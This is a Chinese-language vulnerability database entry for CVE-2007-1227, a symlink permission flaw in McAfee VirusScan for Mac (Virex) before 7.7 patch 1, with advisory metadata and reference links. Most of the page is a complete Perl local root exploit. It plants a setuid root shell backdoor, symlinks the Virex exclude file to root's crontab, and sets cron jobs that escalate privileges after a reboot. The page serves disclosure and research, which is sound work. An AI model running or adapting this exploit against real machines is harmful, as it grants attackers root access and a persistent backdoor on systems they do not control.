McAfee VirusScan /Library/应用程序 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112329 漏洞类型 权限许可和访问控制
发布时间 2007-02-28 更新时间 2007-03-02
CVE编号 CVE-2007-1227 CNNVD-ID CNNVD-200703-090
漏洞平台 OSX CVSS评分 6.6
|漏洞来源
https://www.exploit-db.com/exploits/3386
https://www.securityfocus.com/bid/81884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-090
|漏洞详情
McAfeeVirusScanforMac(Virex)7.7patch1之前的版本中的VShieldCheck允许本地用户借助一个对/Library/应用程序Support/Virex/VShieldExclude.txt的symlink攻击,更改任意文件的许可。比如通过对rootcrontab文件的symlink攻击,执行任意指令。
|漏洞EXP
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Following symlinks is bad mmmmmmmmmmkay!
#

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\"  ";

unless (($target) = @ARGV) {
       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a\n";
       }

       print "\n";
       exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id  /Users/Shared/shX");  # this is for those without gcc.

# set aside root crontab dropper
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' > /var/cron/tabs/root\"\)\;\n";

# rm the existing log file and symlink it to the root crontab file. A
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep 90; crontab /Users/Shared/xxx' > /tmp/user_cron");
system("echo '* * * * * /usr/bin/id' >  /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"

# milw0rm.com [2007-02-28]
|受影响的产品
McAfee Virex 7.7 - Mac McAfee Virex 6.2 - Mac
|参考资料

来源:XF
名称:mcafee-virex-library-privilege-escalation(32729)
链接:http://xforce.iss.net/xforce/xfdb/32729
来源:SECTRACK
名称:1017707
链接:http://www.securitytracker.com/id?1017707
来源:BID
名称:22744
链接:http://www.securityfocus.com/bid/22744
来源:BUGTRAQ
名称:20070227[NETRAGARD-20070220SECURITYADVISORY][McAfeeVirusScanforMac(Virex)LocalrootexploitandScanBypass]
链接:http://www.securityfocus.com/archive/1/archive/1/461485/100/0/threaded
来源:VUPEN
名称:ADV-2007-0777
链接:http://www.frsirt.com/english/advisories/2007/0777
来源:SREASON
名称:2342
链接:http://securityreason.com/securityalert/2342
来源:SECUNIA
名称:24337
链接:http://secunia.com/advisories/24337
来源:OSVDB
名称:33797
链接:http://osvdb.org/33797